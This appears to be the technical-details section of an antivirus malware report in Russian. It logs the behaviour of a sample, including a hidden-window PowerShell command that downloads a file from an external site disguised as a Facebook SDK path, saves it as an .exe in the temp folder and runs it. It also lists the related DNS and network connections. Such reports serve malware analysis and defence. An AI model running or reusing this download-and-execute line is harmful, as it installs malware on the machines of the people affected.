Техническая информация
- http://hemsireformasi.org/system/vendor/facebook-sdk/fcbk/fcbk.mdk как %temp%\mamkatrampa.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://hemsireformasi.org/system/vendor/facebook-sdk/fcbk/fcbk.mdk','%TMP%\MamkaTrampa.exe');Start-Process '%TMP%\MamkaTrampa.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1360
- %TEMP%\990949.cvr
- 'he####eformasi.org':80
- DNS ASK he####eformasi.org
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://hemsireformasi.org/system/vendor/facebook-sdk/fcbk/fcbk.mdk','%TMP%\MamkaTrampa.exe');Start-Process '%TMP%\MamkaTrampa.exe'; (со скрытым окном)